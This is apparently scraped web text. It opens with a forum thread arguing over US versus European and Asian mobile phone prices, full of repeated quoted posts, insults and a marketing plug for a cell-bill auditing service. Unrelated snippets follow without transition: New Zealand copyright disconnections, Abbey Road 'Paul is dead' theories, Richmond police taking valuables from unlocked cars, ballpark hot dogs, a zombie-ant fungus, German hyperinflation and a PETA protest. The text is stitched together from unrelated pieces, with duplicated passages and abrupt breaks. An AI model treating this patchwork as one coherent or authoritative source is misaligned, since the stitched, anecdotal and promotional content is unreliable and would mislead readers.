Find me a total percentage of a person 's income spent to support their wireless service after everything has been more accurately calculated , and then we might have a comparison that is useful and fair .
Sure we pay more , but how is it compared when you throw in the price of the phones ?
We often see higher priced plans because the phone 's cost is being subsidized by them .
Also , my plan covers a significant area .
A plan that covers most of Europe would have to be considered to be comparable , not just individual countries like the Netherlands .
I could probably find a cheaper plan if it only covered an area the size of Maryland .
Yes , Europe tends to have more advanced communications , and their trains rock , but the numbers are n't as far off as it might seem .
What about taxes ?
Have any taxes been added to the cost of these plans ?
Some of these countries have taken a lot of money from their people to finance the infrastructure .
This cost would also have to be included to the overall price being paid for service .
Find me a total percentage of a person 's income spent to support their wireless service after everything has been more accurately calculated , and then we might have a comparison that is useful and fair .
So yes , actually , in the US taxpayers have indeed funded most of the infrastructure already .
Let 's not forget the huge markups Verizon and AT&T charge on special access lines , completely abusing their duopolistic control over the middle mile .
It is incredibly frustrating to be paying so much to these greedy thugs after paying for the infrastructure .
Umm... remember the $ 200 billion dollars of tax payer money the ISP incumbents stole over the last decade or so ?
It did n't just vanish into thin air .
They spent most of that money on building out their wireless infrastructure .
So yes , actually , in the US taxpayers have indeed funded most of the infrastructure already .
Let 's not forget the huge markups Verizon and AT&T charge on special access lines , completely abusing their duopolistic control over the middle mile .
It is incredibly frustrating to be paying so much to these greedy thugs after paying for the infrastructure .
jmn1207
Premium Member
join:2000-07-19
Sterling , VA jmn1207 Premium Member Re : How Much For That Phone In The Window ?
What is $ 200 billion dollars in a percentage of our total income when compared to others ?
Face it , our conglomerates are just better at price gouging customers than the European corporations .
We win !
Gardener
Premium Member
join:2006-10-19
Burnaby , BC ·TELUS
Gardener Premium Member Try CDN $ 134.40 per year
Most of my family is on " pay - and - talk " that costs $ 11.20 per month , including taxes .
$ 0.25 / minute for voice and $ 0.15 / text in or out .
Seems reasonable for casual use .
I 'm in the age group that was brought up to call only when necessary and to keep calls short ; my kids pay for their own service .
When I bought the phone , incoming text messages were free , then Telus began charging for incoming texts .
Now we find that a short voice call is more cost - effective than exchanging several text messages , so we 've adapted our use to the greed of the carrier .
yock
TFTC
Premium Member
join:2000 -11-21
Miamisburg , OH 1 recommendation yock Premium Member Subsidized ?
I wonder how subsidized the networks are in the " cheapest " parts of the world .
Lower bills are irrelevant if you 're making up for it in taxes .
hoyleysox
Premium Member
join:2003-11-07
Long Beach , CA hoyleysox Premium Member Coverage areas
The netherlands is a small country relative to the US so I reason it would take fewer cell towers to cover the country .
The US has a lot more rural areas to cover ...
Not really sure about sweden .
Parogadi
What ?
Stop Looking At Me Like That
Premium Member
join:2003-03-31
Racine , WI Parogadi Premium Member Re : Coverage areas we do n't have to and neither do they , they at least put up towers where people actually are , unlike the us where we maybe , just might get around to it 3 years after we claim we cover your small to mid sized city with minimum 500 k people in it ...
your argument is still a straw man as if the place already has power , water , sewage , road , natural gas , phone cable the whole works then theres no reason internet and cell service should be any harder t put in , in fact it should be even easier to put in as phone and cable lines are there thus fios connections should be at some nodes in the area .
Hell cell is about the easiest of these things to install , you only need a few antennas , you do n't need to run wiring or pipes to each and every home and business ...
so GTFO corporate shill .
hoyleysox
Premium Member
join:2003-11-07
Long Beach , CA hoyleysox Premium Member Re : Coverage areas said by Parogadi :
we do n't have to and neither do they , they at least put up towers where people actually are , unlike the us where we maybe , just might get around to it 3 years after we claim we cover your small to mid sized city with minimum 500 k people in it ...
your argument is still a straw man as if the place already has power , water , sewage , road , natural gas , phone cable the whole works then theres no reason internet and cell service should be any harder t put in , in fact it should be even easier to put in as phone and cable lines are there thus fios connections should be at some nodes in the area .
Hell cell is about the easiest of these things to install , you only need a few antennas , you do n't need to run wiring or pipes to each and every home and business ...
so GTFO corporate shill .
we do n't have to and neither do they , they at least put up towers where people actually are , unlike the us where we maybe , just might get around to it 3 years after we claim we cover your small to mid sized city with minimum 500 k people in it ... your argument is still a straw man as if the place already has power , water , sewage , road , natural gas , phone cable the whole works then theres no reason internet and cell service should be any harder t put in , in fact it should be even easier to put in as phone and cable lines are there thus fios connections should be at some nodes in the area .
Hell cell is about the easiest of these things to install , you only need a few antennas , you do n't need to run wiring or pipes to each and every home and business ... so GTFO corporate shill .
I am not talking about how difficult it is to install a cell tower , I am talking how many you have to put up to cover an area : a lot more in the US than the Netherlands .
Btw : see below for definition of a straw man argument , then reread your post .
»en.wikipedia.org/wiki/Straw_man
Personal attacks with signature vouching for free speech .
sheesh .
must be a late night .
I am not talking about how difficult it is to install a cell tower , I am talking how many you have to put up to cover an area : a lot more in the US than the Netherlands .
Btw : see below for definition of a straw man argument , then reread your post .
Personal attacks with signature vouching for free speech .
sheesh .
must be a late night .
Parogadi
What ?
Stop Looking At Me Like That
Premium Member
join:2003-03-31
Racine , WI Parogadi Premium Member Re : Coverage areas sure because you need to have a 3g capable cell tower everywhere in the us ... if your population density for a given area is 1 person per mile fucket , no tower needed , that guy is bear food for all anyone cares , but for any place with a decent amount of people it should cost this much or take this long for them to install a tower .
If a place has a population density high enough for all the other utilities and amenities then cell with at least 3g should be installed promptly .
landmass of the Netherlands has nothing to do with it as the install cost is about the same anywhere and everywhere .
You got any more strawmen to set ablaze ?
hoyleysox
Premium Member
join:2003-11-07
Long Beach , CA hoyleysox Premium Member Re : Coverage areas said by Parogadi :
sure because you need to have a 3g capable cell tower everywhere in the us ... if your population density for a given area is 1 person per mile fucket , no tower needed , that guy is bear food for all anyone cares , but for any place with a decent amount of people it should cost this much or take this long for them to install a tower .
If a place has a population density high enough for all the other utilities and amenities then cell with at least 3g should be installed promptly .
landmass of the Netherlands has nothing to do with it as the install cost is about the same anywhere and everywhere .
You got any more strawmen to set ablaze ?
sure because you need to have a 3g capable cell tower everywhere in the us ... if your population density for a given area is 1 person per mile fucket , no tower needed , that guy is bear food for all anyone cares , but for any place with a decent amount of people it should cost this much or take this long for them to install a tower .
If a place has a population density high enough for all the other utilities and amenities then cell with at least 3g should be installed promptly .
landmass of the Netherlands has nothing to do with it as the install cost is about the same anywhere and everywhere .
You got any more strawmen to set ablaze ?
You are correct that the land mass alone is not the issue .
I should have elaborated that low population density areas coupled with land mass is the issue that makes costs higher in the US than the Netherlands , thus driving up rates .
I reread my initial post and I still do n't see how it constitutes a straw man argument , not that I do n't make them .
Usually straw man arguments include phrases like " some people say ... "
I did not try to twist anyone else 's argument , my point was my own .
I felt like ending with an ad hominem argument but thought it would not show class .
Your first paragraph summarizes my point pretty well .
You are correct that the land mass alone is not the issue .
I should have elaborated that low population density areas coupled with land mass is the issue that makes costs higher in the US than the Netherlands , thus driving up rates .
I reread my initial post and I still do n't see how it constitutes a straw man argument , not that I do n't make them .
Usually straw man arguments include phrases like " some people say ... "
I did not try to twist anyone else 's argument , my point was my own .
I felt like ending with an ad hominem argument but thought it would not show class .
Parogadi
What ?
Stop Looking At Me Like That
Premium Member
join:2003-03-31
Racine , WI Parogadi Premium Member Re : Coverage areas because you 're still making the assumption that these other countries are putting up a cell tower no matter the population density which with a certainty I can assure you they are n't .
Their deployments follow a logical path that you 'd expect .
You make the assumption that we somehow have to pay 5 x as much simply because we have more places to put towers , thats crap because you only need to put the towers where the people are which would mean you wo n't have tower that are n't making money , the towers in your large cities would end up subsidizing the deployment of the ones in areas that are n't packed like sardines .
but you still wont be putting up cell towers in bat country .
So yes , your argument is still a straw man as it still holds no water .
The expenses in the US still do n't justify those costs , what does ?
greedy ass execs that need another 15 150 k cars and million dollar house every year .
hoyleysox
Premium Member
join:2003-11-07
Long Beach , CA hoyleysox Premium Member Re : Coverage areas said by Parogadi :
because you 're still making the assumption that these other countries are putting up a cell tower no matter the population density which with a certainty I can assure you they are n't .
Their deployments follow a logical path that you 'd expect .
You make the assumption that we somehow have to pay 5 x as much simply because we have more places to put towers , thats crap because you only need to put the towers where the people are which would mean you wo n't have tower that are n't making money , the towers in your large cities would end up subsidizing the deployment of the ones in areas that are n't packed like sardines .
but you still wont be putting up cell towers in bat country .
So yes , your argument is still a straw man as it still holds no water .
The expenses in the US still do n't justify those costs , what does ?
greedy ass execs that need another 15 150 k cars and million dollar house every year .
because you 're still making the assumption that these other countries are putting up a cell tower no matter the population density which with a certainty I can assure you they are n't .
Their deployments follow a logical path that you 'd expect .
You make the assumption that we somehow have to pay 5 x as much simply because we have more places to put towers , thats crap because you only need to put the towers where the people are which would mean you wo n't have tower that are n't making money , the towers in your large cities would end up subsidizing the deployment of the ones in areas that are n't packed like sardines .
but you still wont be putting up cell towers in bat country .
So yes , your argument is still a straw man as it still holds no water .
The expenses in the US still do n't justify those costs , what does ?
greedy ass execs that need another 15 150 k cars and million dollar house every year .
I am going to let this one rest .
Talking about greedy people with cars & mansions is not a very sophisticated argument either .
I consider my statement vague since you interpreted it differently than I intended .
I could have been more specific about what I meant by " cover the country . "
What you are pointing out is different from a straw man argument .
It could be called a false assumption .
It would be a straw man argument for me to suggest that everyone I disagree with makes a straw man argument .
I am going to let this one rest .
Talking about greedy people with cars & mansions is not a very sophisticated argument either .
djdanska
Rudie32
Premium Member
join:2001-04-21
San Diego , CA djdanska Premium Member About right ... $ 635.85 per year ?
My last month cell bill was higher than that !
( Did not help that my brother bought a blackberry 8900 . )
With 5 lines , i pay about $ 3000 a year for just service .
I have 5 lines so that is about right .
I do have 3 full data plans , a cheap data plan , unlimited messaging , myfaves , m2 m , and 1800 monthly minutes .
I bet most people do n't have that .
I can only imagine how much someone on verizon would pay for the same thing .
openbox9
Premium Member
join:2004-01-26
71144 openbox9 Premium Member Re : About right ... $ 3,000 / 5=$ 600 per year .
You 're doing better than avg axiomatic
join:2006-08-23
Tomball , TX axiomatic Member Features
Then when you throw in all the extra cool network features other countries get that America does n't the situation looks even more dire for the US .
Come on Wireless company executives ... you do n't need another vacation home in the Hampton's .
Really , you do n't !
Time
Premium Member
join:2003-07-05
Irvine , CA Time Premium Member
The only cost effective carrier is ..
Sprint , at least partially .
I 'm on their $ 69.99 Everything Data plan + taxes - 15 % Armed Forces discount .
Comes out to about $ 63 a month in total .
I was paying over $ 100 a month for my iPhone , so I can't complain too much .
en102
Canadian , eh ?
join:2001-01-26
Valencia , CA en102 Member Re :
The only cost effective carrier is ..
I thought Boost and MetroPCS were cheaper .
Time
Premium Member
join:2003-07-05
Irvine , CA Time Premium Member Re :
The only cost effective carrier is .. said by en102 :
I thought Boost and MetroPCS were cheaper .
I thought Boost and MetroPCS were cheaper .
You 're from Valencia , I 'm jealous .
My girlfriend lives in Northshire .
Absolutely love the area .
I was speaking in terms of postpaid providers .
Boost and Metro have their own audiences .
You 're from Valencia , I 'm jealous .
My girlfriend lives in Northshire .
Absolutely love the area .
CheapCell
@comcast.net CheapCell Anon
How about a comparision with India and China Prepaid cell phone calls in India are about 2 cents to 4 cents a minute .
Text messages are 400 messages for a dollar .
Incoming calls and texts are free .
Also the US has a larger area and hence more costs theory is bogus .
India has more cell phone towers then the US and has about 450 million cell phone users .
Telecoms in the US have bought ( or at best hoodwinked ) Congress and squelched such comparisons
••• show 3 replies iansltx
join:2007-02-19
Austin , TX · Time Warner Cable
iansltx Member
Only sheeple pay that much for wireless these days
If you can stick around their coverage area , a semilocal provider down here ( Pocket Communications ) offers unlimited talk , text and pix for $ 25 ( plus taxes = around $ 30 ) per month .
Page Plus Cellular now offers unlimited talk , text , some web and picture messaging on Verizon 's network for $ 40 per month , straight - up .
Straight Talk offers 1000 minutes , 1000 texts and 30 MB of data / MMS access for $ 30 .
There 's really no reason why 99 % of the country should be paying more than $ 50 for their cell ... oh wait , more than 1 % are on the iPhone .
As for cellular rates around $ 11 per month , not gonna happen unless you 're on prepaid and only use maybe 100 minutes and a few texts per month .
That said , I have one family member whose cell service runs around $ 6.50 per month ( prepaid , does n't talk much ) , two family members whose service runs around $ 20 - $ 25 per month ( they talk more , still prepaid ) and myself , whose cellular service runs around $ 42 per month including data , taxes and fees .
Plus another $ 10 for TeleNav , but that gets billed through TeleNav and I can turn it off whenever .
All four phones are either out of contract ( mine ) or had no contract in the first place .
The cell company is making money off of all of us ( including me , even though I 'll use 1.2 GB of data per month on my phone every once in awhile ) .
About the Netherlands comparison though , they use phones differently than we do .
They 're very skewed toward prepaid , whereas we 're skewed toward postpaid .
They do n't use a lot of minutes .
We do .
They do n't have exclusive phones with 2 - year contracts that still give you relatively high prices for the phone you want .
We do .
They have calling - party - pays .
We do n't .
•••• show 4 replies bsoft
join:2004-03-28
Boulder , CO bsoft Member Calls per year ?
Calls per year is a pretty bad metric , because it does n't take into account the length of the calls .
In the US , many ( if not most ) postpaid plans have " free " night , weekend , and same carrier minutes .
I can talk as long as I want with immediate family without paying , if I call them on their mobile phone .
I regularly have one - hour plus calls .
I use over 1200 minutes per month on a " 500 minute " plan because of this ( plus free nights / weekends ) .
That would tend to skew the call distribution in the wrong direction .
While I probably only make about 1200 calls per year , I use about 15000 minutes per year .
Also consider that roaming is considerably cheaper in the US - specifically , there 's pretty much no roaming charges whatsoever .
I am not billed extra for using GSM service anywhere in the US , which , I might add , is considerably larger than all of Europe ( excluding Russia ) .
Someone in the UK going to Belgium has to pay extra to make / receive calls .
But I can drive 600 miles in any direction without paying roaming ( it helps to live in Colorado ) .
Now , as for low - usage subscribers , the US model sucks .
If you like to save money by texting , well , sorry , that 's expensive here .
And our prepaid plans stink , although they are getting better .
sonicmerlin
join:2009-05 - 24
Cleveland , OH 1 recommendation sonicmerlin Member Re : Calls per year ?
Um , cell phone plans are cheaper in India and China than in the US .
They have pretty large landmasses and happen to be 3rd - world countries .
The landmass argument is retarded .
While we have larger amounts of land than most of the countries in the OECD , we also have larger populations , much of which are concentrated in urban environments .
tuminatr9
join:2003-03-19
Saint Paul , MN tuminatr9
Member the countrys we are compaired to are the size of one state yes it costs more people demand free long distance and nationwide roaming if there were cell plans like landlines say $ 20 per month unlimited but you pay roaming and long distance this would be best for most Americans but people are stupid and they wont ever change
SysOp
join:2001-04-18
Atlanta , GA SysOp Member Check out Boost Mobile $ 50 a month x 12 = $ 600 a year
Nation wide unlimited voice , web , and mms .
No extra fees , all tax is included .
antidelldude
join:2003-12-22
Beverly Hills , CA antidelldude Member I pay alot , but not as much as some .
I pay $ 280 a month to those thieves at Sprint for unlimited data ( 5 gb ... what a scam ) / unlimited text / 1500 minutes / unlimited airave minutes / 5 lines / and the complete scam insurance is ( they replace my $ 500 phone with a POS that is more broken then the original , on replacement phone # 4 now , getting ready for a lawsuit because this is the second time I had to go through a bunch replacements before they did anything ) .
Being that Verizon quoted me $ 450 and did n't have the unlimited femtocell option , and ATT is just junk in my area and also quoting in the upper $ 400's , ( Ha , You think I looked at t- mobile ? )
I feel like $ 280 is a bargain in our current market , but still way overpriced for the services rendered even if performance is decent .
Something will have to change soon , but if the public keeps paying these ridiculous prices and living with the issues crap wireless service causes as if it was a normal trait of a cellphone , we will get nowhere fast .
bUU
join:2007-05-10
Alpharetta , GA bUU Member
This is just yet another " Woe is the consumer " whine do n't subscribe .
It is that easy .
BTW , without regard to whether wireless is more or less expensive in Canada , Spain and the United States , there are a lot of things that are .
Prices are based on perceived value ; and different people in different countries perceive value differently .
( One would n't think that this was big news . )
If you do n't think a service is worth the price it is offered to you , then It is that easy .
BTW , without regard to whether wireless is more or less expensive in Canada , Spain and the United States , there are a lot of things that are .
Prices are based on perceived value ; and different people in different countries perceive value differently .
( One would n't think that this was big news .
rodlaben0
join:2009-08-13
united state rodlaben0 Member this looks like a seriously flawed report
My two cents :
While I think U.S. operators offer too little flexibility in pricing -- for example forcing subscribers to buy large buckets  of minutes -- this OECD report appears to greatly overstate the disparity between the most expensive and least expensive markets .
The biggest flaw is that the report appears to completely ignore the cost of receiving calls in the caller pays markets .
This is a HUGE omission .
Take for example the high use example in the Netherlands .
While it is true that the mobile phone subscriber does not pay for incoming calls , it is not fair to say that these calls are free .
There is a real cost to these calls - - a cost that should be included to reach an equitable comparison .
I know all of two Dutch words , but I was able to navigate around KPNs website .
On an analog home phone line , calls to mobiles are approx .
 0.18 ( or $ 0.26 ) per minute .
The OECD report assumes for high users , 1680 outgoing minutes and 1272 incoming minutes per year ( the report isnt totally clear ; I assume this is the difference between total and outgoing ) .
If we assume just half of these minutes are calls placed from a home fixed line to a mobile , the added cost is actually approx .
$ 165 ( 1272 ÷ 2 x $ 0.26 ) .
This is just one of the apparent flaws in this report .
Even more basic , just do the math .
The high survey assumes 140 minutes per month , of those 84 are at peak times .
In the notes , the report indicates in the Netherlands , fixed costs are $ 15 per month with NO usage charges .
Can someone who knows better Dutch provide a link to a non-prepaid plan ( report notes specify high plans are not pre-paid ) that costs $ 15 a month that includes at least 140 minutes -- including calls to other mobile networks ?
Oh , and dont get me started on the nickel - and - dime charges on my T - Mobile Germany bill .
It s not all perfect in Europe .
Try paying  0.49 to call customer service or  1.50 for an itemized bill - - or being stuck in a dead zone with no ability to roam domestically .
Dylan
@rr.com Dylan
Anon let 's lower those cell bills ...
For more info , check out Validas in the national news media , most recently on Fox News at »
Good luck to everyone reading on cutting your wireless costs .
Dylan
Consumer Marketing Manager , FixMyCellBill.com
Karl , nice ( albeit depressing ) post .
I wanted to add that there 's no reason we should be overpaying so much for cell phones when there are alternative methods to reducing wireless expenses .
I 'm not trying to overtly plug here , but I think this is relevant : I work for the consumer advocacy division of the company Validas , where we electronically audit and subsequently reduce the average cell bill by 22 percent through our website , » www.fixmycellbill.com .
Put simply , Validas guards against frivolous and unnecessary charges that inflate your cell bill more than it should be for your usage .
You can find out for free if fixmycellbill.com can modify your plan to better suit your needs by going to the website .
The key thing here is that we can optimize a cell plan , to better suit someone 's usage than their current plan .
By tinkering with the plan , rather than changing it , you avoid early termination fees and the hassle of switching .
For more info , check out Validas in the national news media , most recently on Fox News at » www.myfoxtampabay.com/dp ··· s_072409
Good luck to everyone reading on cutting your wireless costs .
DylanConsumer Marketing Manager , FixMyCellBill.com Infantabella
join:2009-09-10
Miami , FL Infantabella Member Pre-paid cell phones offer the best value right now .
The reason why we are charged more in the US right now is because most consumers think they need to sign a two year contract with a major carrier for service .
That 's not how the rest of the world operates and it's no longer necessary in the Us either .
I just switched to a pre-paid cell phone called StraighTalk , available at any Walmart , and got unlimited talk and text for $ 45 a month .
I used to spend upwards of $ 120 monthly for this before !
I researched for best cell phone value and found out that StraighTalk is considered the best network option because it 's serviced by Verizon , which means the most reliable , Consumer Report rated , cell phone company in the US .
You can check out their website straightalk.com or walmart.com and figure out that by paying less you 'll get more .
your comment ..
The motion - picture industry has spoken out against a New Zealand proposal to allow them to disconnect entire households from the Internet if one member is accused of copyright infringement ; they want to be able to disconnect your Internet connection without giving you a chance to defend yourself in front of a judge because that would be " time consuming . "
Instead , they would like to be lord high executioner for your network connection , with the power to shut you out of the benefits of the network ( freedom of speech , assembly and the press ; access to school , health , family , work and government ) without having to prove it in a real court of law .
The motion picture industry has become one of the gravest threats to modern democracy .
I 've given up on hoping that they 'll see the light .
Now I just hope they 'll go bankrupt before they can bring on a new dark age , all in the name of preserving the future of fifth - rate sequels to Z- rate adaptations of schlocky comic books .
FACT director Tony Eaton says that his organization does n't have a problem with judicial process – as long as it's on their terms .
" The concern is that we send out 1000 infringement notices , and then someone says , ` The way to stall this is let 's all go to arbitration ' , and a year later we could still be going through that same process , " Eaton said .
" Do we get to the point where we have 1000 cases to be heard by the Copyright Tribunal ?
If everyone brings their lawyer , we will only do five in a day , " he added .
By anyone 's measurement , even given the lack of accuracy inherent in some anti-piracy evidence , 100 % error rate and 100 % appeals is a little pessimistic to say the least and to suggest everyone would bring a lawyer is absurd – the cost would be hugely prohibitive .
Nevertheless , Mr Eaton said he would prefer to be able to present evidence in bulk to the tribunal – in search of corresponding disconnections in bulk , no doubt .
Movie Studios Want Own Version of Justice For 3 Strikes
Pictured : The Beatles album cover that started a decades - long conspiracy theory
Forty years ago yesterday , at 11.35 am , The Beatles walked across a zebra crossing in an innocuous North London street .
The photoshoot for their new Abbey Road album happened just yards from the eponymous recording studios and took ten minutes - only six frames were taken by the photographer , Iain Macmillan , who was perched on a stepladder .
It has since become one of the most iconic covers in history for two reasons - no album cover has inspired more imitations , and none has spawned such a mass of conspiracy theories .
The Beatles ' world - famous Abbey Road album cover that sparked a million conspiracy theories
For Beatles obsessives with fevered imaginations , it was ultimate proof of the bizarre theory of the time - that Paul McCartney was , in fact , dead .
According to the legend , Paul had died in a car accident and been replaced by an impostor .
The band , it was said , subsequently felt guilty about the deception , and so placed hidden clues on the album cover for their fans .
Thus , even today , despite the apparent rude health of McCartney , they insist that if you look closely at the images on the front and back of the album it is packed with deathly symbolism .
Beatlemania : A tribute band joined hundreds of fans in Abbey Road yesterday to celebrate the 40th anniversary of the famous photoshoot
Surrounded : A bus comes to a standstill as fans mob the Abbey Road site
What is certain is that the album denoted one death of sorts .
Unbeknown to the public at the time , The Beatles were in the final throes of a bitter break - up and would never record another album .
Relations had deteriorated to such an extent that the group abandoned their original title of Everest , together with a shoot in the Himalayas , and were photographed instead walking away from the studios and everything they had once shared .
For other devotees , however , far more could be read into the image ...
1. THE FUNERAL
The procession of The Beatles across the zebra crossing , say the conspiracy theorists , represents Paul 's funeral .
John Lennon leads in a white suit and symbolises the preacher ; Ringo Starr is the mourner , dressed in black ; George Harrison , in scruffy shirt and trousers , denotes the grave - digger ;
Paul is wearing an old suit and is the only one who is barefoot .
He later explained that he began the shoot wearing sandals but , because it was a hot day , he kicked them off .
The theorists believed that if this was the case , the hot tarmac would be too uncomfortable .
This , they argued , was a sign that Paul was the corpse .
2. THE CIGARETTE
Paul McCartney is left - handed , but here holds his cigarette in his right hand .
At the time , cigarettes were commonly referred to as ' coffin nails ' .
This , therefore , could be seen as a message that Paul 's ' coffin lid ' had been nailed down and that the man in the picture was a lookalike .
Paul is also out of step with the other band members .
Each of the others has his left leg forward , but Paul has his right leg forward - again marking him out as different .
3. THE REGISTRATION PLATE
The white VW Beetle in the background has the registration LMW 28IF - 28 being the age conspiracy theorists say Paul would have been IF he had n't ' died ' .
In fact , Paul was 27 when Abbey Road was released - but fortunately for the theorists , Indian mystics count a person's age from conception , not birth , in which case Paul would have indeed been 28 at the time .
Besides , the band were famously followers of the Indian guru , Maharishi Mahesh Yogi .
It has also been suggested that the LMW stands for ' Linda McCartney Weeps ' - referring to his new wife whom he had married earlier that year .
4. THE SPECTATORS
In the background , a small group of people dressed in white stand on one side of the road , while a lone person stands on the other .
Is this meant to be Paul , alone and different from the others ?
5. THE POLICE VAN
On the right - hand side of the road is a black police van , believed to be a reference to the police who kept quiet about Paul 's ' death ' .
According to legend , the band 's manager , Brian Epstein , bought their silence , and the presence of the Maria is meant as another subtle thank you .
6. THE LINE OF CARS
A line can be traced from the VW Beetle to the three cars in front of it .
If it is drawn connecting their right wheels it runs straight through Paul 's head , with theorists suggesting that means Paul sustained a head injury because of a car crash .
7. THE BLOODSTAIN
On the Australian version of the album , the cover showed what could be a bloodstain splattered on the road just behind Ringo and John , supposedly backing claims of a road accident .
8. THE CRACKED S
On the back cover there is a picture of the Abbey Road sign and above it the name Beatles has been written .
There is an obvious crack running through the S - thought to suggest problems within the group .
9. THE DOTS
To the left of the name ' BEATLES ' there are a series of eight dots .
When joined together they form the number three .
Did this mean there were only three Beatles left ?
10 . IMAGE OF DEATH
If the back cover is turned 45 degrees anticlockwise a crude image of the Grim Reaper appears , from his skull to his black gown .
Theorists believed it was a sign that someone in the group had died .
11 . THE GIRL
Nobody knows the identity of the girl dressed in blue on the back cover .
On the night of the theorists ' ' car crash ' it was raining heavily and Paul is said to have given a lift to a fan called Rita .
It could be that this girl is her , either fleeing the scene or running to get help .
12 . PAUL'S FINAL RESTING PLACE
If the writing on the wall is split into sections , it conveys the cryptic message , ' Be at Les Abbey ' .
In numerology the following two letters , R and O , are the 18th and 15th letters in the alphabet .
By adding this together ( 33 ) and multiplying by the number of letters ( 2 ) , we get 66 , the year Paul is supposed to have died .
Three also represents the letter C so 33 could also stand for CC .
Cece is short for Cecilia , with theorists claiming Paul was ' laid to rest ' at St Cecilia 's Abbey , a monastery in Ryde , Isle of Wight .
There are a high number of thefts from cars in Richmond
It is not uncommon to find items stolen from unlocked cars but it is rare that the " culprit " is a police officer .
Officers in Richmond , south - west London , are entering unlocked cars to remove valuables , such as handbags and laptops , leaving a note for the driver .
Supt Jim Davis said no law was being breached but admitted : " Technically we are entering the vehicle . "
But a leading lawyer said police could face civil proceedings for trespass if any items taken by them were damaged .
The new police tactic , launched last month , is aimed at tackling thefts from cars which has recently risen by 40 % in the area .
Until now , 25 cars have been targeted and an item has been removed in only one case .
Supt Davis said Richmond Police had received " no negative complaints " so far .
But lawyer Orlando Pownall QC , who lives in Richmond Hill , said : " It undoubtedly is a trespass and there could be civil proceedings if a person shows a damage or loss has resulted from the trespass .
" Police need to ensure that information on a computer or mobile is not looked at and kept in a secure place - otherwise it could be an intrusion .
We do n't want to take people 's property as it is an awful lot of bureaucracy and hassle for us
Supt Jim Davis
" It might also be worthwhile for officers to take a photo like traffic wardens . "
Supt Davis said officers on patrol were only targeting unlocked cars with a valuable item on display .
Officers try to contact the owner and if that is not possible they remove the item and leave a note for the driver advising to retrieve it from Twickenham police station .
In 2008 , 1,300 thefts from cars were reported in the borough , of which 220 involved sat - navs .
But the figure had risen by 40 % by this July .
Supt Davis said : " We identified that 21 % of thefts from cars were from unlocked cars , so no sign of forced entry .
" Technically we are entering the vehicle but we are not committing a crime .
It 's a common law duty to protect ( people 's ) property .
" We do n't want to take people 's property as it is an awful lot of bureaucracy and hassle for us but we are doing this to make sure people take responsibility of their valuables . "
Richmond Council said it backed the police 's scheme .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Getting aboard my time machine , I realized that the Hot Dogs as America at National Portrait Gallery in Washington DC echoes a 2002 exhibit at the American Museum of Natural History titled Baseball as America which ( I quote ) " offered a selection of ten of the most tempting hot dogs from ballparks and cities around the country , in celebration of Baseball As America , the first major exhibition to examine the relationship between baseball and American culture " and that " hot dogs are as much a fixture of baseball stadiums as the bleachers , pennants , scoreboards , and organ music . "
Besides the 3 choices offered at National Portrait Gallery , the 7 other Hot Dogs on the menu in 2002 were the New York Street Cart Dog , the Dodger Dog , the Rochester White Hot , the Milwaukee Brat , the Cincinnati Cheese Coney , the Texas Corn Dog and the museum 's own creation , the Natural .
Based on names , my 2 favorites would be " the White Hot from Rochester 's own Zweigle 's Meats , made of pork , has a widespread following in western New York .
It is neither cured nor smoked .
The resulting dog is off - white in color with a spicy taste and smooth texture .
Split and griddled , this dog is served on a toasted bun and topped with a hot sauce ( a meat chili made from a secret Rochester recipe ) , chopped onions , and any one of a variety of mustards " and the Milwaukee Brat which as its name suggests is not a hot dog " but a bratwurst , the Milwaukee Brat represents this baseball town 's favorite sausage .
Made by Usinger 's , one of the country 's best sausage makers , the pork and beef brat is grilled and dipped in " Secret Stadium Sauce " and served on a crusty roll , topped with sauerkraut and spicy brown mustard . "
I give extra points to Usinger 's for their Fritzie the Elf ( above ) who they say continues the " long - standing tradition in Germany has always had elves working at night to finish the work of the cobblers , bakers , coopers , sausage makers etc .
When the craftsmen could n't get their work finished ... "
Elves have been the company 's mascot since the 1950's ...
Food , sport , regional taste , history and good stories ...
Which one is your favorite ?
What beer would you drink with it ?
Related : Hot Dogs as America in DC from Fenway Frank and Chicago Red Hot to NY Deli Dog
Scientists say they have discovered a horrific flesh - eating fungus which is able to infect living creatures and turn them into " zombies " .
The hapless victims are then compelled to shamble away to a location where their immobilised bodies - as they are gradually consumed from within , acting as food supply and nest to the ghastly fungal offspring - can spray out more spores to seize control of more hosts .
For now , the terrifying Ophiocordyceps unilateralis fungus appears to be focusing its zombie extermination campaign primarily on carpenter ants of the sort found in the jungles of Thailand .
“ The fungus accurately manipulates the infected ants into dying where the parasite prefers to be , by making the ants travel a long way during the last hours of their lives , ” says Dr David Hughes of Exeter and Harvard universities .
Having successfully taken over an ant , the fungus compels it to leave its normal haunts high in the forest canopy and directs the unfortunate insect down into the dark , moist basement layers of the jungle .
There the luckless creature is compelled to clamber onto the underside of a leaf in the O unilateralis ' favoured location for reproduction - some 25 cm above the ground , on the northwestern side of the tree or plant in question .
Once in such a location , the dying ant is made to clamp its mandibles - jaws - firmly shut onto the leaf , and then hangs lifelessly from them to become a food supply and home for the burgeoning , ghastly fungus - children within .
Most of the insect 's innards are gradually converted into food and consumed , but the muscles holding the mandibles shut are cunningly left alone .
In order to prevent any rivals trying to snaffle the nutritious ant corpse , the fungus also forms a protective coating or cocoon over the hanging victim .
Presently a stroma or " fruiting body " sprouts from the back of the insect 's head and begins to shower drifting spores down on the forest floor beneath - each of which could infect another unlucky passerby .
The fungus ' dreadful capabilities were already well - known in the insect - zombification boffin community , but Hughes ' latest research has revealed just how precisely the hapless walking - dead ants are controlled .
He theorises that the deadly rain of mind - control zombo spores may be why the carpenter ants try to avoid the lower levels of the jungle as much as they can .
Hughes ' and his colleagues ' new paper , The Life of a Dead Ant : The Expression of an Adaptive Extended Phenotype , can be read by subscribers to The American Naturalist here . ®
Millions , Billions , Trillions Germany in the Era of Hyperinflation
During the hyperinflation in Germany of 1920s , the country 's currency , the mark , went crazy .
The government of the Weimar Republic may have been able to clear its debts , but it came at the cost of the citizens ' savings .
It 's an era that is still part of the national psyche today .
The industry has said that unless Congress extends the program as many as 50,000 jobs are at risk .
Participating carriers , including Hawaiian , promised not to furlough or lay off employees until today .
When The Pretenders ' Chrissie Hynde comes to Salt Lake City tomorrow , she 'll have more on her mind than just rocking Red Butte Gardens .
---
On Monday , August 24 , Hynde will also be rocking the McDonald 's at 242 S. 700 East .
A longtime spokeperson for PETA , Hynde ( a vegan ) will debut her " i'm hatin ' it " parody of the popular McDonald 's ad as she launches a national campaign against the hamburger chain 's alleged cruel methods of slaughtering chickens .
